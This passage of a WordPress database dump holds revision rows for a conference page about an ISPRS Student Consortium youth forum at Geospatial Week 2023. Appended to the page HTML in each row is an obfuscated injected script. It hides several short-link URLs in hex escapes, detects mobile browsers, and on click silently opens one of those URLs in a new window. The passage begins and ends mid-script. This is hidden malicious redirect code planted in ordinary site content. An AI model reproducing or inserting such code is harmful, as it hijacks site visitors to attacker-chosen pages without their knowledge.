_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Youth Presentation Forum','','inherit','closed','closed','','3613-revision-v1','','','2023-01-22 04:56:09','2023-01-22 04:56:09','',3613,'https://gsw2023.com/?p=3625',0,'revision','',0),
(3626,1,'2023-01-22 04:57:41','2023-01-22 04:57:41','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3618\" img_size=\"600x400\"][vc_single_image image=\"3620\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5>The ISPRS Student Consortium (ISPRS SC) is the official representation of the students and the youth to ISPRS. One of its aims is to provide a platform for the exchange of information and to organize student-specific events and other activities that integrate students and the youth more effectively into ISPRS activities.<br />\nISPRS SC organizes a forum where students and young researchers attending the Geospatial Week 2023 can give a presentation about their research. We particularly encourage local and regional students to participate and provide the attendees with an overview of the geospatial and/or remote sensing research undertaken in Egypt and other African Regions, although presentations throughout the globe are welcomed.<br />\nThe objective of this forum is to provide a platform for communication, networking and exchange of research ideas among students and young professionals while promoting ISPRS SC and its activities. Moreover, as one of the ISPRS SC targets of 2023 is to expand our sphere of influence in Africa through Student Chapters and collaborations, this event will be an opportunity for us to connect with people and organizations that might become our next African partners.<br />\nImportantly, the best paper nominated from this forum will be eligible to compete for the ISPRS Student Consortium Excellence Award.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\">Forum Organizers</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry][vc_separator color=\"peacoc\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<strong>Themes of the event:</strong><br />\nWe welcome papers from students and young researchers submitting their research in all the areas using RS, GIS and Photogrammetry technologies in addition to the following themes:<br />\n⦁ GIS and Remote Sensing (RS) For a Sustainable Future.<br />\n⦁ Applications of Machine Learning in Geospatial Technologies.<br />\n⦁ Use of Open Source Tools/Technologies in GIS and Remote Sensing.<br />\n⦁ Crowdsourcing and Citizen Science in Geospatial Sector.<br />\n⦁ GIS Education and Outreach Activities.</p>\n<h5><strong>Featuring Forum Report in ISPRS SC Newsletter: </strong><br />\nWe accept both the abstracts and full papers that have been submitted by following ISPRS guidelines. After the forum, authors of the selected papers will be invited to submit an article detailing their research to the “Spectrum” (ISPRS SC Newsletter), in its Spotlight section. We will also feature the summary of this event in the Spectrum.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Youth Presentation Forum','','inherit','closed','closed','','3613-revision-v1','','','2023-01-22 04:57:41','2023-01-22 04:57:41','',3613,'https://gsw2023.com/?p=3626',0,'revision','',0);
INSERT INTO `dnctiavkr_posts` VALUES
(3627,1,'2023-01-22 04:58:04','2023-01-22 04:58:04','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3618\" img_size=\"600x400\"][vc_single_image image=\"3620\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5>The ISPRS Student Consortium (ISPRS SC) is the official representation of the students and the youth to ISPRS. One of its aims is to provide a platform for the exchange of information and to organize student-specific events and other activities that integrate students and the youth more effectively into ISPRS activities.<br />\nISPRS SC organizes a forum where students and young researchers attending the Geospatial Week 2023 can give a presentation about their research. We particularly encourage local and regional students to participate and provide the attendees with an overview of the geospatial and/or remote sensing research undertaken in Egypt and other African Regions, although presentations throughout the globe are welcomed.<br />\nThe objective of this forum is to provide a platform for communication, networking and exchange of research ideas among students and young professionals while promoting ISPRS SC and its activities. Moreover, as one of the ISPRS SC targets of 2023 is to expand our sphere of influence in Africa through Student Chapters and collaborations, this event will be an opportunity for us to connect with people and organizations that might become our next African partners.<br />\nImportantly, the best paper nominated from this forum will be eligible to compete for the ISPRS Student Consortium Excellence Award.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\">Forum Organizers</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry][vc_separator color=\"peacoc\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong>Themes of the event:</strong><br />\nWe welcome papers from students and young researchers submitting their research in all the areas using RS, GIS and Photogrammetry technologies in addition to the following themes:<br />\n⦁ GIS and Remote Sensing (RS) For a Sustainable Future.<br />\n⦁ Applications of Machine Learning in Geospatial Technologies.<br />\n⦁ Use of Open Source Tools/Technologies in GIS and Remote Sensing.<br />\n⦁ Crowdsourcing and Citizen Science in Geospatial Sector.<br />\n⦁ GIS Education and Outreach Activities.</h5>\n<h5><strong>Featuring Forum Report in ISPRS SC Newsletter: </strong><br />\nWe accept both the abstracts and full papers that have been submitted by following ISPRS guidelines. After the forum, authors of the selected papers will be invited to submit an article detailing their research to the “Spectrum” (ISPRS SC Newsletter), in its Spotlight section. We will also feature the summary of this event in the Spectrum.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(